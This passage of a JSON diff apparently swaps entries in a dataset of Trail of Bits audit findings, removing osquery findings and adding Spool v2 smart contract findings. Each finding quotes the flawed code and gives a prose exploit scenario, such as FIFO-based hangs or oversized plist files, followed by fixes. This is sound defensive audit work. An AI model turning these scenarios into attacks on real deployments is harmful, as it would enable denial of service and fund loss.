a reward token for a smart vault through the RewardManager contract, but they cannot remove it from the blacklist. As a result, a reward token cannot be used again once it is blacklisted. The RewardManager.forceRemoveReward function blacklists the given reward token by updating the RewardManager.tokenBlacklist array (gure 23.1). Blacklisted tokens cannot be used as rewards. function forceRemoveReward ( address smartVault , IERC20 token) external onlyRole(ROLE_SPOOL_ADMIN, msg.sender ) { tokenBlacklist[smartVault][token] = true ; _removeReward(smartVault, token); delete rewardConfiguration[smartVault][token]; } Figure 23.1: The forceRemoveReward function in spool-v2-core/RewardManager.sol#L160L165 However, RewardManager does not have a function to remove tokens from the blacklist. As a result, if the Spool admin accidentally blacklists a token, then the smart vault admin will never be able to use that token to send rewards. Exploit Scenario Alice is the admin of a smart vault. She adds WETH and token A as rewards. The value of token A declines rapidly, so a Spool admin decides to blacklist the token for Alices vault. The Spool admin accidentally supplies the WETH address in the call to forceRemoveReward . As a result, WETH is blacklisted, and Alice cannot send rewards in WETH. Recommendations Short term, add a function with the proper access controls to remove tokens from the blacklist. Long term, improve the systems unit tests to cover all execution paths.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "2. No separation of privileges when executing dependency code ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "In several places in the codebase, the osquery agent realizes the functionality of a table by invoking code in a dependency project. For example, the yara table is implemented by invoking code in libyara. However, there is no separation of privileges or sandboxing in place when the code in the dependency library is called, so the library code executes with the same privileges as the osquery agent. Considering the projects numerous dependencies, this issue increases the osquery agents attack surface and would exacerbate the eects of any vulnerabilities in the dependencies. Exploit Scenario An attacker nds a vulnerability in a dependency library that allows her to gain code execution, and she elevates her privileges to that of the osquery agent. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, create a security barrier against the dependency library code to minimize the impact of vulnerabilities. 16 Atlassian: osquery Security Assessment", + "title": "24. Risk of unclaimed shares due to loss of precision in reallocation operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The ReallocationLib.calculateReallocation function releases strategy shares and calculates their USD value. The USD value is later converted into strategy shares in the ReallocationLib.doReallocation function. Because the conversion operations always round down, the number of shares calculated in doReallocation will be less than the shares released in calculateReallocation . As a result, some shares released in calculateReallocation will be unclaimed, as ReallocationLib distributes only the shares computed in doReallocation . ReallocationLib.calculateAllocation calculates the USD value that needs to be withdrawn from each of the strategies used by smart vaults (gure 24.1). The smart vaults release the shares equivalent to the calculated USD value. /** * @dev Calculates reallocation needed per smart vault. [...] * @return Reallocation of the smart vault: * - first index is 0 or 1 * - 0: * - second index runs over smart vault's strategies * - value is USD value that needs to be withdrawn from the strategy [...] */ function calculateReallocation ( [...] ) private returns ( uint256 [][] memory ) { [...] } else if (targetValue < currentValue) { // This strategy needs withdrawal. [...] IStrategy(smartVaultStrategies[i]). releaseShares (smartVault, sharesToRedeem ); // Recalculate value to withdraw based on released shares. reallocation[ 0 ][i] = IStrategy(smartVaultStrategies[i]).totalUsdValue() * sharesToRedeem / IStrategy(smartVaultStrategies[i]).totalSupply(); } } return reallocation ; } Figure 24.1: The calculateReallocation function in spool-v2-core/ReallocationLib.sol#L161L207 The ReallocationLib.buildReallocationTable function calculates the reallocationTable value. The reallocationTable[i][j][0] value represents the USD amount that should move from strategy i to strategy j (gure 24.2). These USD amounts are calculated using the USD values of the released shares computed in ReallocationLib.calculateReallocation (represented by reallocation[0][i] in gure 24.1). /** [...] * @return Reallocation table: * - first index runs over all strategies i * - second index runs over all strategies j * - third index is 0, 1 or 2 * - 0: value represent USD value that should be withdrawn by strategy i and deposited into strategy j */ function buildReallocationTable ( [...] ) private pure returns ( uint256 [][][] memory ) { Figure 24.2: A snippet of buildReallocationTable function in spool-v2-core/ReallocationLib.sol#L209L228 ReallocationLib.doReallocation calculates the total USD amount that should be withdrawn from a strategy (gure 24.3). This total USD amount is exactly equal to the sum of the USD values needed to be withdrawn from the strategy for each of the smart vaults. The doReallocation function converts the total USD value to the equivalent number of strategy shares. The ReallocationLib library withdraws this exact number of shares from the strategy and distributes them to other strategies that require deposits of these shares. function doReallocation ( [...] uint256 [][][] memory reallocationTable ) private { // Distribute matched shares and withdraw unamatched ones. for ( uint256 i ; i < strategies.length; ++i) { [...] { uint256 [ 2 ] memory totals; // totals[0] -> total withdrawals for ( uint256 j ; j < strategies.length; ++j) { totals[ 0 ] += reallocationTable[i][j][ 0 ] ; [...] } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalSupply() * totals[ 0 ] / IStrategy(strategies[i]).totalUsdValue(); [...] } [...] Figure 24.3: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285L350 Theoretically, the shares calculated for a strategy should be equal to the shares released by all of the smart vaults for that strategy. However, there is a loss of precision in both the calculateReallocation functions calculation of the USD value of released shares and the doReallocation functions conversion of the combined USD value to strategy shares. As a result, the number of shares released by all of the smart vaults will be less than the shares calculated in calculateReallocation . Because the ReallocationLib library only distributes these calculated shares, there will be some unclaimed strategy shares as dust. It is important to note that the rounding error could be greater than one in the context of multiple smart vaults. Additionally, the error could be even greater if the conversion results were rounded in the opposite direction: in that case, if the calculated shares were greater than the released shares, the reallocation would fail when burn and claim operations are executed. Recommendations Short term, modify the code so that it stores the number of shares released in calculateReallocation , and implement dustless calculations to build the reallocationTable value with the share amounts and the USD amounts. Have doReallocation use this reallocationTable value to calculate the value of sharesToDistribute . Long term, use Echidna to test system and mathematical invariants.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: Low" ] }, { - "title": "3. No limit on the amount of information that can be read from the Firefox add-ons table ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The implementation of the Firefox add-ons table has no limit on the amount of information that it can read from JSON les while enumerating the add-ons installed on a user prole. This is because to directly read and parse the Firefox prole JSON le, the parseJSON implementation in the osquery agent uses boost::property_tree, which does not have this limit. pt::ptree tree; if (!osquery::parseJSON(path + kFirefoxExtensionsFile, tree).ok()) { TLOG << \"Could not parse JSON from: \" << path + kFirefoxExtensionsFile; return; } Figure 3.1: The osquery::parseJSON function has no limit on the amount of data it can read. Exploit Scenario An attacker crafts a large, valid JSON le and stores it on the Firefox prole path as extensions.json (e.g., in ~/Library/Application Support/Firefox/Profiles/foo/extensions.json on a macOS system). When osquery executes a query using the firefox_addons table, the parseJSON function reads and parses the complete le, causing high resource consumption. Recommendations Short term, enforce a maximum le size within the Firefox table, similar to the limits on other tables in osquery. Long term, consider removing osquery::parseJSON and implementing a single, standard way to parse JSON les across osquery. The osquery project currently uses both boost::property_tree and RapidJSON libraries to parse JSON les, resulting in the use of dierent code paths to handle untrusted content. 17 Atlassian: osquery Security Assessment", + "title": "25. Curve3CoinPoolAdapters _addLiquidity reverts due to incorrect amounts deposited ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The _addLiquidity function loops through the amounts array but uses an additional element to keep track of whether deposits need to be made in the Strategy.doHardWork function. As a result, _addLiquidity overwrites the number of tokens to send for the rst asset, causing far fewer tokens to be deposited than expected, thus causing the transaction to revert due to the slippage check. function _addLiquidity( uint256 [] memory amounts, uint256 slippage) internal { uint256 [N_COINS] memory curveAmounts; for ( uint256 i; i < amounts.length; ++i) { curveAmounts[assetMapping().get(i)] = amounts[i]; } ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage); } Figure 25.1: The _addLiquidity function in spool-v2-core/CurveAdapter.sol#L12L20 The last element in the doHardWork functions assetsToDeposit array keeps track of the deposits to be made and is incremented by one on each iteration of assets in assetGroup if that asset has tokens to deposit. This variable is then passed to the _depositToProtocol function and then, for strategies that use the Curve3CoinPoolAdapter , is passed to _addLiquidity in the amounts parameter. When _addLiquidity iterates over the last element in the amounts array, the assetMapping().get(i) function will return 0 because i in assetMapping is uninitialized. This return value will overwrite the number of tokens to deposit for the rst asset with a strictly smaller amount. function doHardWork(StrategyDhwParameterBag calldata dhwParams) external returns (DhwInfo memory dhwInfo) { _checkRole(ROLE_STRATEGY_REGISTRY, msg.sender ); // assetsToDeposit[0..token.length-1]: amount of asset i to deposit // assetsToDeposit[token.length]: is there anything to deposit uint256 [] memory assetsToDeposit = new uint256 [](dhwParams.assetGroup.length + 1); unchecked { for ( uint256 i; i < dhwParams.assetGroup.length; ++i) { assetsToDeposit[i] = IERC20(dhwParams.assetGroup[i]).balanceOf(address(this)); if (assetsToDeposit[i] > 0) { ++assetsToDeposit[dhwParams.assetGroup.length]; } } } [...] // - deposit assets into the protocol _depositToProtocol(dhwParams.assetGroup, assetsToDeposit, dhwParams.slippages); Figure 25.2: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L71L75 Exploit Scenario The doHardWork function is called for a smart vault that uses the ConvexAlusdStrategy strategy; however, the subsequent call to _addLiquidity reverts due to the incorrect number of assets that it is trying to deposit. The smart vault is unusable. Recommendations Short term, have _addLiquidity loop the amounts array for N_COINS time instead of its length. Long term, refactor the Strategy.doHardWork function so that it does not use an additional element in the assetsToDeposit array to keep track of whether deposits need to be made. Instead, use a separate Boolean variable. The current pattern is too error-prone.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "4. The SIP status on macOS may be misreported ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "If System Integrity Protection (SIP) is disabled on a Mac running osquery, the SIP conguration table might not report the correct value in the enabled column for the config_flag: sip row. For this misreporting to happen, extra ags need to be present in the value returned by csr_get_active_config and absent in the osquery kRootlessConfigFlags list. This is the case for the ags CSR_ALLOW_ANY_RECOVERY_OS, CSR_ALLOW_UNAPPROVED_KEXTS, CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE, and CSR_ALLOW_UNAUTHENTICATED_ROOT in xnu-7195.141.2/bsd/sys/csr.h (compare gure 4.1 and gure 4.3). /* CSR configuration flags */ #define CSR_ALLOW_UNTRUSTED_KEXTS (1 << 0) #define CSR_ALLOW_UNRESTRICTED_FS (1 << 1) #define CSR_ALLOW_TASK_FOR_PID (1 << 2) #define CSR_ALLOW_KERNEL_DEBUGGER (1 << 3) #define CSR_ALLOW_APPLE_INTERNAL (1 << 4) #define CSR_ALLOW_DESTRUCTIVE_DTRACE (1 << 5) /* name deprecated */ #define CSR_ALLOW_UNRESTRICTED_DTRACE (1 << 5) #define CSR_ALLOW_UNRESTRICTED_NVRAM (1 << 6) #define CSR_ALLOW_DEVICE_CONFIGURATION (1 << 7) #define CSR_ALLOW_ANY_RECOVERY_OS (1 << 8) #define CSR_ALLOW_UNAPPROVED_KEXTS (1 << 9) #define CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE (1 << 10) #define CSR_ALLOW_UNAUTHENTICATED_ROOT (1 << 11) Figure 4.1: The CSR ags in xnu-7159.141.2 18 Atlassian: osquery Security Assessment QueryData results; csr_config_t config = 0; csr_get_active_config(&config); csr_config_t valid_allowed_flags = 0; for (const auto& kv : kRootlessConfigFlags) { valid_allowed_flags |= kv.second; } Row r; r[\"config_flag\"] = \"sip\"; if (config == 0) { // SIP is enabled (default) r[\"enabled\"] = INTEGER(1); r[\"enabled_nvram\"] = INTEGER(1); } else if ((config | valid_allowed_flags) == valid_allowed_flags) { // mark SIP as NOT enabled (i.e. disabled) if // any of the valid_allowed_flags is set r[\"enabled\"] = INTEGER(0); r[\"enabled_nvram\"] = INTEGER(0); } results.push_back(r); Figure 4.2: How the SIP state is computed in genSIPConfig // rootless configuration flags // https://opensource.apple.com/source/xnu/xnu-3248.20.55/bsd/sys/csr.h const std::map kRootlessConfigFlags = { // CSR_ALLOW_UNTRUSTED_KEXTS {\"allow_untrusted_kexts\", (1 << 0)}, // CSR_ALLOW_UNRESTRICTED_FS {\"allow_unrestricted_fs\", (1 << 1)}, // CSR_ALLOW_TASK_FOR_PID {\"allow_task_for_pid\", (1 << 2)}, // CSR_ALLOW_KERNEL_DEBUGGER {\"allow_kernel_debugger\", (1 << 3)}, // CSR_ALLOW_APPLE_INTERNAL {\"allow_apple_internal\", (1 << 4)}, // CSR_ALLOW_UNRESTRICTED_DTRACE {\"allow_unrestricted_dtrace\", (1 << 5)}, // CSR_ALLOW_UNRESTRICTED_NVRAM {\"allow_unrestricted_nvram\", (1 << 6)}, // CSR_ALLOW_DEVICE_CONFIGURATION {\"allow_device_configuration\", (1 << 7)}, }; Figure 4.3: The ags currently supported by osquery 19 Atlassian: osquery Security Assessment Exploit Scenario An attacker, who has gained a foothold with root privileges, disables SIP on a device running macOS and sets the csr_config ags to 0x3e7. When building the response for the sip_config table, osquery misreports the state of SIP. Recommendations Short term, consider reporting SIP as disabled if any ag is present or if any of the known ags are present (e.g., if (config & valid_allowed_flags) != 0). Long term, add support for reporting the raw ag values to the table specication and code so that the upstream server can make the nal determination on the state of SIP, irrespective of the ags supported by the osquery daemon. Additionally, monitor for changes and add support for new ags as they are added on the macOS kernel. 20 Atlassian: osquery Security Assessment", + "title": "26. Reallocation process reverts when a ghost strategy is present ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The reallocation process reverts in multiple places when a ghost strategy is present. As a result, it is impossible to reallocate a smart vault with a ghost strategy. The rst revert would occur in the mapStrategies function (gure 26.1). Users calling the reallocate function would not know to add the ghost strategy address in the strategies array, which holds the strategies that need to be reallocated. This function reverts if it does not nd a strategy in the array. Even if the ghost strategy address is in strategies , a revert would occur in the areas described below. function mapStrategies( address [] calldata smartVaults, address [] calldata strategies, mapping ( address => address []) storage _smartVaultStrategies ) private view returns ( uint256 [][] memory ) { [...] // Loop over smart vault's strategies. for ( uint256 j; j < smartVaultStrategiesLength; ++j) { address strategy = smartVaultStrategies[j]; bool found = false ; // Try to find the strategy in the provided list of strategies. for ( uint256 k; k < strategies.length; ++k) { if (strategies[k] == strategy) { // Match found. found = true ; strategyMatched[k] = true ; // Add entry to the strategy mapping. strategyMapping[i][j] = k; break ; } } if (!found) { list // If a smart vault's strategy was not found in the provided // of strategies, this means that the provided list is invalid. revert InvalidStrategies(); } } } Figure 26.1: A snippet of the mapStrategies function in spool-v2-core/ReallocationLib.sol#L86L144 During the reallocation process, the doReallocation function calls the beforeRedeemalCheck and beforeDepositCheck functions even on ghost strategies (gure 26.2); however, their implementation is to revert on ghost strategies with an IsGhostStrategy error (gure 26.3) . function doReallocation( address [] calldata strategies, ReallocationParameterBag calldata reallocationParams, uint256 [][][] memory reallocationTable ) private { if (totals[0] == 0) { reallocationParams.withdrawalSlippages[i]); IStrategy(strategies[i]).beforeRedeemalCheck(0, // There is nothing to withdraw from strategy i. continue ; } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalUsdValue(); IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).beforeRedeemalCheck( sharesToDistribute, reallocationParams.withdrawalSlippages[i] ); [...] // Deposit assets into the underlying protocols. for ( uint256 i; i < strategies.length; ++i) { IStrategy(strategies[i]).beforeDepositCheck(toDeposit[i], reallocationParams.depositSlippages[i]); [...] Figure 26.2: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285L 469 contract GhostStrategy is IERC20Upgradeable, IStrategy { [...] function beforeDepositCheck( uint256 [] memory , uint256 [] calldata ) external pure { revert IsGhostStrategy(); } function beforeRedeemalCheck( uint256 , uint256 [] calldata ) external pure { revert IsGhostStrategy(); } Figure 26.3: The beforeDepositCheck and beforeRedeemalCheck functions in spool-v2-core/GhostStrategy.sol#L98L104 Exploit Scenario A strategy is removed from a smart vault. Bob, who has the ROLE_ALLOCATOR role, calls reallocate , but it reverts and the smart vault is impossible to reallocate. Recommendations Short term, modify the associated code so that ghost strategies are not passed to the reallocate function in the _smartVaultStrategies parameter. Long term, improve the systems unit and integration tests to test for smart vaults with ghost strategies. Such tests are currently missing.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: High", + "Difficulty: High" ] }, { - "title": "5. The OpenReadableFile function can hang on reading a le ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The OpenReadableFile function creates an instance of the PlatformFile class, which is used for reading and writing les. The constructor of PlatformFile uses the open syscall to obtain a handle to the le. The OpenReadableFile function by default opens the le using the O_NONBLOCK ag, but if PlatformFiles isSpecialFile method returns true, it opens the le without using O_NONBLOCK. On the POSIX platform, the isSpecialFile method returns true for les in which fstat returns a size of zero. If the le to be read is a FIFO, the open syscall in the second invocation of PlatformFiles constructor blocks the osquery thread until another thread opens the FIFO le to write to it. struct OpenReadableFile : private boost::noncopyable { public: explicit OpenReadableFile(const fs::path& path, bool blocking = false) : blocking_io(blocking) { int mode = PF_OPEN_EXISTING | PF_READ; if (!blocking) { mode |= PF_NONBLOCK; } // Open the file descriptor and allow caller to perform error checking. fd = std::make_unique(path, mode); if (!blocking && fd->isSpecialFile()) { // A special file cannot be read in non-blocking mode, reopen in blocking // mode mode &= ~PF_NONBLOCK; blocking_io = true; fd = std::make_unique(path, mode); } } public: std::unique_ptr fd{nullptr}; 21 Atlassian: osquery Security Assessment bool blocking_io; }; Figure 5.1: The OpenReadableFile function can block the osquery thread. Exploit Scenario An attacker creates a special le, such as a FIFO, in a path known to be read by the osquery agent. When the osquery agent attempts to open and read the le, it blocks the osquery thread indenitely, in eect making osquery unable to report the status to the server. Recommendations Short term, ensure that the le operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on le operations so that a block does not stall the osquery thread. References The Single Unix Specication, Version 2 22 Atlassian: osquery Security Assessment", + "title": "27. Broken test cases that hide security issues ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Multiple test cases do not check sucient conditions to verify the correctness of the code, which could result in the deployment of buggy code in production and the loss of funds. The test_extendRewardEmission_ok test does not check the new reward rate and duration to verify the eect of the call to the extendRewardEmission function on the RewardManager contract: function test_extendRewardEmission_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount * 2, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount * 2); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration); vm.stopPrank(); } Figure 27.1: An insucient test case for extendRewardEmission spool-v2-core/RewardManager.t.sol The test_removeReward_ok test does not check the new reward token count and the deletion of the reward conguration for the smart vault to verify the eect of the call to the removeReward function on the RewardManager contract: function test_removeReward_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); skip(rewardDuration + 1); rewardManager.removeReward(smartVault, rewardToken); vm.stopPrank(); } Figure 27.2: An insucient test case for removeReward spool-v2-core/RewardManager.t.sol There is no test case to check the access controls of the removeReward function. Similarly, the test_forceRemoveReward_ok test does not check the eects of the forced removal of a reward token. Findings TOB-SPL-28 and TOB-SPL-29 were not detected by tests because of these broken test cases. The test_removeStrategy_betweenFlushAndDHW test does not check the balance of the master wallet. The test_removeStrategy_betweenFlushAndDhwWithdrawals test removes the strategy before the do hard work execution of the deposit cycle instead of removing it before the do hard work execution of the withdrawal cycle, making this test case redundant. Finding TOB-SPL-33 would have been detected if this test had been correctly implemented. There may be other broken tests that we did not nd, as we could not cover all of the test cases. Exploit Scenario The Spool team deploys the protocol. After some time, the Spool team makes some changes in the code that introduces a bug that goes unnoticed due to the broken test cases. The team deploys the new changes with condence in their tests and ends up introducing a security issue in the production deployment of the protocol. Recommendations Short term, x the test cases described above. Long term, review all of the systems test cases and make sure that they verify the given state change correctly and suciently after an interaction with the protocol. Use Necessist to nd broken test cases and x them.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4852,113 +7500,113 @@ ] }, { - "title": "6. Methods in POSIX PlatformFile class are susceptible to race conditions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The POSIX implementation of the methods in the PlatformFile class includes several methods that return the current properties of a le. However, the properties can change during the lifetime of the le descriptor, so the return values of these methods may not reect the actual properties. For example, the isSpecialFile method, which is used to determine the strategy for reading the le, calls the size method. However, the le size can change between the time of the call and the reading operation, in which case the wrong strategy for reading the le could be used. bool PlatformFile::isSpecialFile() const { return (size() == 0); } static uid_t getFileOwner(PlatformHandle handle) { struct stat file; if (::fstat(handle, &file) < 0) { return -1; } return file.st_uid; } Status PlatformFile::isOwnerRoot() const { if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == 0) { return Status::success(); } return Status(1, \"Owner is not root\"); } Status PlatformFile::isOwnerCurrentUser() const { 23 Atlassian: osquery Security Assessment if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == ::getuid()) { return Status::success(); } return Status(1, \"Owner is not current user\"); } Status PlatformFile::isExecutable() const { struct stat file_stat; if (::fstat(handle_, &file_stat) < 0) { return Status(-1, \"fstat error\"); } if ((file_stat.st_mode & S_IXUSR) == S_IXUSR) { return Status::success(); } return Status(1, \"Not executable\"); } Status PlatformFile::hasSafePermissions() const { struct stat file; if (::fstat(handle_, &file) < 0) { return Status(-1, \"fstat error\"); } // We allow user write for now, since our main threat is external // modification by other users if ((file.st_mode & S_IWOTH) == 0) { return Status::success(); } return Status(1, \"Writable\"); } Figure 6.1: The methods in PlatformFile could cause race issues. Exploit Scenario A new function is added to osquery that uses hasSafePermissions to determine whether to allow a potentially unsafe operation. An attacker creates a le that passes the hasSafePermissions check, then changes the permissions and alters the le contents before the le is further processed by the osquery agent. 24 Atlassian: osquery Security Assessment Recommendations Short term, refactor the operations of the relevant PlatformFile class methods to minimize the race window. For example, the only place hasSafePermissions is currently used is in the safePermissions function, in which it is preceded by a check that the le is owned by root or the current user, which eliminates the possibility of an adversary using the race condition; therefore, refactoring may not be necessary in this method. Add comments to these methods describing possible adverse eects. Long term, refactor the interface of PlatformFile to contain the potential race issues within the class. For example, move the safePermissions function into the PlatformFile class so that hasSafePermissions is not exposed outside of the class. 25 Atlassian: osquery Security Assessment", + "title": "28. Reward emission can be extended for a removed reward token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Smart vault owners can extend the reward emission for a removed token, which may cause tokens to be stuck in the RewardManager contract. The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward conguration: function _removeReward( address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for ( uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount- 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break ; } } } Figure 28.1: The _removeReward function in spool-v2-core/RewardManger.sol The extendRewardEmission function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] conguration is not zero to make sure that the token was already added to the smart vault: function extendRewardEmission( address smartVault, IERC20 token, uint256 reward, uint32 rewardsDuration) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardConfiguration[smartVault][token].tokenAdded == 0) { revert InvalidRewardToken(address(token)); } rewardConfiguration[smartVault][token].rewardsDuration = rewardsDuration; _extendRewardEmission(smartVault, token, reward); } Figure 28.2: The extendRewardEmission function in spool-v2-core/RewardManger.sol After removing a reward token from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] conguration is left as nonzero, which allows the smart vault owner to extend the reward emission for the removed token. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. After some time, she forgets that she removed token A from her vault. She calls extendRewardEmission with 1,000 token A as the reward. The amount of token A is transferred from Alice to the RewardManager contract, but it is not distributed to the users because it is not present in the list of reward tokens added for smart vault S. The 1,000 tokens are stuck in the RewardManager contract. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] conguration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "7. No limit on the amount of data that parsePlist can parse ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "To support several macOS-specic tables, osquery contains a function called osquery::parsePlist, which reads and parses property list (.plist) les by using the Apple Foundation framework class NSPropertyListSerialization. The parsePlist function is used by tables such as browser_plugins and xprotect_reports to read user-accessible les. The function does not have any limit on the amount of data that it will parse. id ns_path = [NSString stringWithUTF8String:path.string().c_str()]; id stream = [NSInputStream inputStreamWithFileAtPath:ns_path]; if (stream == nil) { return Status(1, \"Unable to read plist: \" + path.string()); } // Read file content into a data object, containing potential plist data. NSError* error = nil; [stream open]; id plist_data = [NSPropertyListSerialization propertyListWithStream:stream options:0 format:NULL error:&error]; Figure 7.1: The parsePlist implementation does not have a limit on the amount of data that it can deserialize. 26 Atlassian: osquery Security Assessment auto info_path = path + \"/Contents/Info.plist\"; // Ensure that what we're processing is actually a plug-in. if (!pathExists(info_path)) { return; } if (osquery::parsePlist(info_path, tree).ok()) { // Plugin did not include an Info.plist, or it was invalid for (const auto& it : kBrowserPluginKeys) { r[it.second] = tree.get(it.first, \"\"); // Convert bool-types to an integer. jsonBoolAsInt(r[it.second]); } } Figure 7.2: browser_plugins uses parsePlist on user-controlled les. Exploit Scenario An attacker crafts a large, valid .plist le and stores it in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist on a macOS system running the osquery daemon. When osquery executes a query using the browser_plugins table, it reads and parses the complete le, causing high resource consumption. Recommendations Short term, modify the browser_plugins and xprotect_reports tables to enforce a maximum le size (e.g., by combining readFile and parsePlistContent). Long term, to prevent this issue in future tables, consider removing the parsePlist function or rewriting it as a helper function around a safer implementation. 27 Atlassian: osquery Security Assessment", + "title": "29. A reward token cannot be added once it is removed from a smart vault ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Smart vault owners cannot add reward tokens again after they have been removed once from the smart vault, making owners incapable of providing incentives to users. The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward conguration: function _removeReward( address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for ( uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount- 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break ; } } } Figure 29.1: The _removeReward function in spool-v2-core/RewardManger.sol The addToken function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] conguration is zero to make sure that the token was not already added to the smart vault: function addToken( address smartVault, IERC20 token, uint32 rewardsDuration, uint256 reward) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration[smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if (reward > 0) { _extendRewardEmission(smartVault, token, reward); } } Figure 29.2: The addToken function in spool-v2-core/RewardManger.sol After a reward token is removed from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] conguration is left as nonzero, which prevents the smart vault owner from adding the token again for reward distribution as an incentive to the users of the smart vault. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. Noticing the success of her earlier reward incentive program, she wants to add reward token A to her smart vault again, but her transaction to add the reward token reverts, leaving her with no choice but to distribute another token. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] conguration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: Low" ] }, { - "title": "8. The parsePlist function can hang on reading certain les ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The osquery codebase contains a function called osquery::parsePlist, which reads and parses .plist les. This function opens the target le directly by using the inputStreamWithFileAtPath method from NSInputStream, as shown in gure 7.1 in the previous nding, and passes the resulting input stream to NSPropertyListSerialization for direct consumption. However, parsePlist can hang on reading certain les. For example, if the le to be read is a FIFO, the function blocks the osquery thread until another program or thread opens the FIFO to write to it. Exploit Scenario An attacker creates a FIFO le on a macOS device in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist or ~/Library/Logs/DiagnosticReports/XProtect-foo using the mkfifo command. The osquery agent attempts to open and read the le when building a response for queries on the browser_plugins and xprotect_reports tables, but parsePlist blocks the osquery thread indenitely, leaving osquery unable to respond to the query request. Recommendations Short term, implement a check in parsePlist to verify that the .plist 